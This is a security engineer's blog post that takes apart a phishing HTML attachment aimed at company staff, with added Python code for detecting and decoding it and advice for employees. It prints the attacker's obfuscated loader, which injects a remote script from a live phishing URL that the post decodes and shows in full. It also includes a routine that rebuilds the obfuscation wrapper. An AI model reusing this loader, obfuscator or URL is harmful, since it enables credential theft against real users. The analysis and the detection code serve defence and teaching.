Decomposing a common phishing attack

Laur Telliskivi
Published in Axel Springer Tech, Oct 1, 2023 (8 min read)

According to CISA, 90% of successful cyber attacks start when someone clicks an unfamiliar link or attachment. For those who are not familiar with phishing: it is a type of social engineering attack in which malicious actors use deceptive emails to trick individuals into revealing sensitive information such as login credentials, personal information or financial details. Most commonly, though not exclusively, this is done by sending victims links to fake websites or malicious attachments that appear to come from a legitimate and trusted source. Despite all the advances in security tooling and e-mail security, phishing is still the preferred way to compromise users and companies, because tools only go so far and the human is still regarded as the weakest link in an organization’s cyber security defenses. Recently we received an email with the following headers:

It had an attachment named “Axelspringer Salary Approval.html”. In the inflationary times we are living in, a name like this will surely trigger the human curiosity and greed sensors: could this be the long-awaited salary raise I have been waiting for?! Jokes aside, this is a prime example of social engineering at work: it manipulates recipients emotionally by tapping into their innate curiosity and greed (who wouldn’t want more money?) to lure them into finding out more and opening the malicious attachment, an action that benefits the attacker. Although this is not a very sophisticated phishing email (any attachment with an .html extension should raise red flags for most users, and the sender address does not even remotely resemble our HR email address), it could very well work on some recipients. After all, the attacker does not need every recipient to click on it; one will do just fine! It is a numbers game, and all the attacker needs is that one window of opportunity to get in.

Proceeding with the analysis and decomposing the attack, the next step would be to check the source code of this HTML file. In this instance, I used Sublime Text to view the source code.

<script>
document.write(decodeURIComponent("%t8+KHpV3t8+KHpVCt8+KHpVht8+KHpVtt8+KHpVmt8+KHpVlt8+KHpV%t8+KHpV3t8+KHpVEt8+KHpV%t8+KHpV2t8+KHpV0t8+KHpV%t8+KHpV3t8+KHpVCt8+KHpVit8+KHpVnt8+KHpVpt8+KHpVut8+KHpVtt8+KHpV%t8+KHpV2t8+KHpV0t8+KHpVct8+K
[redacted for readability]
KHpVat8+KHpVyt8+KHpV%t8+KHpV3t8+KHpVAt8+KHpVnt8+KHpVot8+KHpVnt8+KHpVet8+KHpV%t8+KHpV3t8+KHpVBt8+KHpV%t8+KHpV2t8+KHpV2t8+KHpV%t8+KHpV3t8+KHpVEt8+KHpV%t8+KHpV2t8+KHpV0t8+KHpV%t8+KHpV3t8+KHpVCt8+KHpV/t8+KHpVst8+KHpVvt8+KHpVgt8+KHpV%t8+KHpV3t8+KHpVEt8+KHpV%t8+KHpV3t8+KHpVCt8+KHpV/t8+KHpVht8+KHpVtt8+KHpVmt8+KHpVlt8+KHpV%t8+KHpV3t8+KHpVE".replaceAll("t8+KHpV","")))
</script>

The contents confirm that this is no normal HTML file: it contains nothing but some odd-looking JavaScript. What does the JavaScript do? Simplified, it is:

<script>document.write(decodeURIComponent("<stream of weird characters>".replaceAll("t8+KHpV","")))</script>

"<stream of weird characters>".replaceAll("t8+KHpV","") searches the <stream of weird characters> string for every occurrence of the exact sequence "t8+KHpV" and removes all of them, effectively deleting that specific substring from the original string.

The resulting string is then passed to decodeURIComponent(), which decodes a URI component (percent-encoded text) back into plain characters. Finally, document.write() writes the decoded result into the HTML document stream.

To see what this code evaluates to, I will use the Mozilla developer tools, but any code editor would do here. I first execute the decodeURIComponent() call in the developer tools console. Resulting code:

<html> <input class="QXsjbdsvxa" id="b64e" type="hidden" value="dmljdGltbmFtZUBheGVsc3ByaW5nZXIuY29tCg=="/> <svg onload="var _0x4b2851 = _0x2b2c;function _0x2b2c(_0x97d777, _0x995773) { var _0x1fae87 = _0x2921(); _0x2b2c = function (_0x4c0ce9, _0x47d132) { _0x4c0ce9 = _0x4c0ce9 - (-0x25a1 + 0x1b6b + 0xb50); var _0x109750 = _0x1fae87[_0x4c0ce9]; return _0x109750; }; return _0x2b2c(_0x97d777, _0x995773);}(function (_0x4053ff, _0xd1c398) { var _0x412f20 = _0x2b2c; var _0x445caa = _0x4053ff(); while (!![]) { try { var _0x2be3ff = -parseInt(_0x412f20(0x11d)) / (0x3 * 0x1e1 + 0xe6f * 0x1 + -0x1411) + -parseInt(_0x412f20(0x11e)) / (0x1 * -0x1c0f + -0x39 * -0x30 + 0x1161 * 0x1) + parseInt(_0x412f20(0x12a)) / (-0x74b + -0x11ba + 0x1908) * (parseInt(_0x412f20(0x122)) / (-0x3 * -0x476 + 0xb12 + 0x11 * -0x170)) + -parseInt(_0x412f20(0x128)) / (-0x20b1 * -0x1 + 0x1 * -0x2595 + 0x4e9) + parseInt(_0x412f20(0x126)) / (0x1067 + -0x2202 + 0x11a1) + parseInt(_0x412f20(0x121)) / (-0xe38 + 0xdf * -0x26 + 0x17 * 0x20f) * (parseInt(_0x412f20(0x123)) / (0x4 * -0x40 + 0x1 * 0xa7b + -0x973)) + -parseInt(_0x412f20(0x11b)) / (-0x162c * -0x1 + 0x64d * 0x5 + -0x35a4) * (-parseInt(_0x412f20(0x11f)) / (-0x2c7 + 0xf99 + -0x2 * 0x664)); if (_0x2be3ff === _0xd1c398) { break; } else { _0x445caa['push'](_0x445caa['shift']()); } } catch (_0x4b03c9) { _0x445caa['push'](_0x445caa['shift']()); } }}(_0x2921, 0x4e9d9 * 0x1 + 0x9297 + -0x1927e));var IcMQLg = window[_0x4b2851(0x124)];PBWeni = IcMQLg[_0x4b2851(0x127) + _0x4b2851(0x125)](_0x4b2851(0x120) + 'ipt');function _0x2921() { var _0x4fa708 = [ 'Element', '83640KvteCv', 'create', '1543835TnrKnB', 'setAttribu', '186FlXehs', 'body', '5995818QZIMGT', 'src', '487455MZsPAM', '460294AizzKb', '10tQlFMR', 'scr', '120799hQOmAP', '31092awlUZP', '56TaaOpb', 'document' ]; _0x2921 = function () { return _0x4fa708; }; return _0x2921();}PBWeni[_0x4b2851(0x129) + 'te'](_0x4b2851(0x11c), 
String.fromCharCode(104,116,116,112,115,58,47,47,116,104,101,97,109,97,116,101,117,114,109,97,110,100,111,108,105,110,105,115,116,46,99,111,109,47,111,114,105,108,101,98,105,103,109,105,108,108,121,104,117,110,47,104,111,115,116,50,50,47,97,100,109,105,110,47,106,115,47,109,115,46,112,104,112));document[_0x4b2851(0x11a)]['appendChil' + 'd'](PBWeni);" style="display:none;"> </svg></html>

This evaluates to valid HTML, which will be written into the document. We can think of the resulting HTML as composed of two parts:

  • The <input> element:
<input class="QXsjbdsvxa" id="b64e" type="hidden" value="dmljdGltbmFtZUBheGVsc3ByaW5nZXIuY29tCg=="/>

The <input> tag specifies an input field where the user can enter data. Here it is hidden (type="hidden") and carries a string that looks very much like base64 as its value.

% echo dmljdGltbmFtZUBheGVsc3ByaW5nZXIuY29tCg== | base64 --decode
victimname@axelspringer.com

At this point, it is unclear why this value is set; perhaps it tracks which recipient opened the attachment.

  • The <svg> element:
<svg onload="<some odd non-readable javascript code>" style="display:none;"> </svg>

SVG is used to define graphics for the Web. One of its powerful but also dangerous capabilities is that it can include and run JavaScript. In this case, once the HTML page has loaded, the onload handler executes the obfuscated JavaScript. How do we make sense of this obfuscated JavaScript? There is an array of deobfuscation tools out there that can hopefully help.
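The traits visible in this decoded stage (an <svg> with an onload handler, display:none, String.fromCharCode assembling a string, createElement('script'), and a hidden field whose base64 value decodes to a mailbox) are enough to triage HTML attachments at a mail gateway before any deobfuscation. The following Python scorer is an added example, not a tool from the article; its indicator weights and thresholds are assumptions to be tuned on your own mail corpus, and both samples are constructed (the loader URL bytes are a placeholder, not the real host).

```python
"""Gateway-side triage for .html attachments, keyed on the traits of the dropper
above. Added example, not a tool from the article; weights and thresholds are
assumptions to tune on your own mail corpus."""
import base64
import re

# (name, pattern, weight). Weights are assumed, not derived from the article.
INDICATORS = [
    ("staged_decode", re.compile(r'decodeURIComponent\(\s*"[^"]*"\.replace(All)?\('), 3),
    ("document_write", re.compile(r"document\.write\("), 1),
    ("svg_onload", re.compile(r"<svg[^>]*\bonload\s*=", re.I), 3),
    ("hidden_style", re.compile(r"display\s*:\s*none", re.I), 1),
    ("fromcharcode_string", re.compile(r"String\.fromCharCode\(\s*\d+(\s*,\s*\d+){7,}"), 2),
    ("remote_script", re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"), 2),
]

def hidden_b64_email(html: str) -> bool:
    """True when a hidden <input> value is base64 that decodes to a mailbox,
    the recipient-tagging trick seen in the sample."""
    for m in re.finditer(r'<input[^>]*type="hidden"[^>]*value="([A-Za-z0-9+/=]{8,})"', html):
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("ascii").strip()
        except ValueError:        # binascii.Error and UnicodeDecodeError are ValueErrors
            continue
        if re.fullmatch(r"[^@\s]+@[^@\s]+\.[A-Za-z]+", text):
            return True
    return False

def score_attachment(html: str) -> dict:
    """Sum indicator weights and map to a verdict; thresholds are assumptions."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(html)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    if hidden_b64_email(html):
        hits.append("b64_recipient_tag")
        score += 2
    verdict = "block" if score >= 6 else "review" if score >= 3 else "allow"
    return {"score": score, "hits": hits, "verdict": verdict}

# Constructed samples: the decoded stage of the dropper (placeholder URL bytes,
# "https://x") and an ordinary form page with a hidden token for contrast.
MALICIOUS_STAGE = (
    '<html><input class="QXsjbdsvxa" id="b64e" type="hidden" '
    'value="dmljdGltbmFtZUBheGVsc3ByaW5nZXIuY29tCg=="/>'
    '<svg onload="var s=document.createElement(\'script\');'
    's.setAttribute(\'src\',String.fromCharCode(104,116,116,112,115,58,47,47,120));'
    'document.body.appendChild(s);" style="display:none;"></svg></html>')
BENIGN = ('<html><body><form action="/submit"><input type="hidden" name="csrf" '
          'value="Zm9ybS10b2tlbi0xMjM0"/><svg width="10" height="10"><rect/></svg>'
          '</form></body></html>')
```

The raw decodeURIComponent/replaceAll wrapper on its own lands in the review band; scoring the text that wrapper produces is what reaches a block verdict.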

I pasted the obfuscated JavaScript here.

var IcMQLg = window.document
PBWeni = IcMQLg.createElement('script')
PBWeni.setAttribute(
'src', String.fromCharCode(
104, 116, 116, 112, 115, 58, 47, 47, 116, 104, 101, 97, 109, 97, 116, 101, 117, 114, 109, 97, 110, 100, 111, 108, 105, 110, 105, 115, 116, 46, 99, 111, 109, 47, 111, 114, 105, 108, 101, 98, 105, 103, 109, 105, 108, 108, 121, 104, 117, 110, 47, 104, 111, 115, 116, 50, 50, 47, 97, 100, 109, 105, 110, 47, 106, 115, 47, 109, 115, 46, 112, 104, 112
)
)
document.body.appendChild(PBWeni)

This is now much more readable. The code dynamically builds a URL by converting a series of character codes into their respective characters.

The resulting URL is:

<https://theamateurmandolinist.com/orilebigmillyhun/host22/admin/js/ms.php>
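The three layers walked through above (junk-token removal plus decodeURIComponent, the base64 recipient tag in the hidden <input>, and the String.fromCharCode loader URL) can all be reversed statically, without ever executing the script. The following Python is an added example, not the author's tooling: it builds a constructed attachment in the same shape, with a placeholder loader URL (example.invalid) standing in for the real one, and then peels each layer with plain string operations; the junk token is read from the script rather than assumed.

```python
"""Static decoder for the HTML-attachment dropper analysed above. Added example,
not the author's tooling: it never evaluates the JavaScript, it reverses each
layer with string operations so an analyst can triage without a browser."""
import base64
import re
from urllib.parse import quote, unquote

# Matches decodeURIComponent("<blob>".replaceAll("<junk>","")) and captures both.
WRAPPER = re.compile(r'decodeURIComponent\("([^"]*)"\.replaceAll\("([^"]*)",\s*""\)')

def strip_junk_and_decode(blob: str, junk: str) -> str:
    """Layer 1: mirror replaceAll(junk, "") followed by decodeURIComponent()."""
    return unquote(blob.replace(junk, ""))

def find_hidden_b64(html: str) -> str:
    """Layer 2: base64 value of the hidden <input>, i.e. the tagged recipient."""
    m = re.search(r'<input[^>]*value="([A-Za-z0-9+/=]+)"', html)
    return base64.b64decode(m.group(1)).decode().strip() if m else ""

def find_fromcharcode_strings(js: str) -> list:
    """Layer 3: rebuild every String.fromCharCode(...) literal, e.g. the loader URL."""
    return ["".join(chr(int(n)) for n in m.group(1).split(","))
            for m in re.finditer(r"String\.fromCharCode\(([\d,\s]+)\)", js)]

def analyse(attachment: str) -> dict:
    """Walk all three layers; the junk token is read from the script, not assumed."""
    m = WRAPPER.search(attachment)
    if not m:
        raise ValueError("not the decodeURIComponent/replaceAll wrapper")
    html = strip_junk_and_decode(m.group(1), m.group(2))
    return {"junk": m.group(2), "html": html,
            "victim": find_hidden_b64(html),
            "strings": find_fromcharcode_strings(html)}

# Constructed sample in the shape of the real attachment; placeholder loader URL.
LOADER = "https://loader.example.invalid/ms.php"
INNER = ('<html><input id="b64e" type="hidden" '
         'value="dmljdGltbmFtZUBheGVsc3ByaW5nZXIuY29tCg=="/>'
         '<svg onload="var s=document.createElement(\'script\');'
         's.setAttribute(\'src\',String.fromCharCode(%s));'
         'document.body.appendChild(s);" style="display:none;"></svg></html>'
         % ",".join(str(ord(c)) for c in LOADER))

def obfuscate(html: str, junk: str = "t8+KHpV") -> str:
    """Builds the attacker-style wrapper so the decoder can be exercised offline."""
    return ('<script>document.write(decodeURIComponent("%s".replaceAll("%s","")))</script>'
            % (junk.join(quote(html, safe="")), junk))

SAMPLE = obfuscate(INNER)
print(analyse(SAMPLE))  # run stand-alone to see all three layers peeled
```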

Checking the URL with BurpSuite shows that JavaScript is hosted there.

BurpSuite request and response

The page will fetch content from this remote URL and run it in a JavaScript context. Let’s see what this looks like in the browser!

This looks like a classic Microsoft domain login page with the company styling. The apparent purpose of this phishing campaign is to harvest the victim’s login credentials to gain access to our company’s internal resources. Out of interest, I sent a dummy password to it to see whether it validates the credentials. Apparently yes:

Most likely the remote host acts as a malicious proxy that forwards the credentials to Microsoft for verification. Several man-in-the-middle attack frameworks do exactly that, the best known being EvilGinx.

Additionally, I like to use some Open Source Intelligence (OSINT) tools to check URL and domain reputation and get a better understanding of the attack. There are many tools out there, but the best known is VirusTotal. VirusTotal flags the URL as malicious, but not overwhelmingly:

For example, another common tool, urlscan, a service that analyses websites by simulating regular user behavior, does not think the URL is malicious.

Nevertheless, it is a useful service for analyzing such malicious URLs safely without executing any code on your own computer. It also provides a lot of additional information about the URL, as you can see from the screenshot. Please exercise caution when sharing links with urlscan, as these will be publicly indexed and accessible to anyone who searches for them. Therefore, refrain from submitting any confidential company-originated links.

Stay vigilant

If you’ve worked in a corporate environment, chances are you’ve participated in some form of security awareness training focused on detecting phishing attacks. Therefore, I won’t delve into the exhaustive technical and educational measures organizations can take to safeguard against phishing attacks. Instead, I’ll highlight key principles to help you defend against most phishing attempts:

  1. Exercise Patience: Take your time to review the emails you receive. Avoid rushing to click on links or open attachments.
  2. Ask Critical Questions:
  • Sender Verification: Who is the sender of the email? Is the sender’s email address familiar to me?
  • Content Assessment: Does the email’s content align with what you’d expect from this sender? Does it make logical sense?
  • Be Cautious of Requests: Does the email request sensitive actions like money transfers or sharing credentials?
  • Attachments and Links: Does it prompt you to open attachments or click on links? Have you interacted with these links or attachments previously? Do attachments have unusual names or file extensions? When you hover your cursor over a link, does the URL seem legitimate and familiar?

If you’ve quickly run through these questions, you’re likely to sense whether something appears legitimate or raises suspicions. Trust your instincts; if something feels amiss, always double-check the email with the supposed sender through an alternate communication channel, such as a phone call or a message on Slack. Alternatively, seek guidance from your IT department or colleagues in your office. Regrettably, sophisticated phishing campaigns orchestrated by experienced threat actors take these precautions into account, which occasionally makes phishing emails hard to detect. If, however, you do inadvertently engage with one, promptly inform both your IT department and your supervisor. Hopefully, your organization has effective security measures in place to swiftly address security incidents. It’s important to remember that everyone, including security professionals, can fall victim to a phishing attack.

Former requirements engineer and a musician. Currently Senior Security Engineer at Axel Springer. Follow me on Twitter: @tell1skivi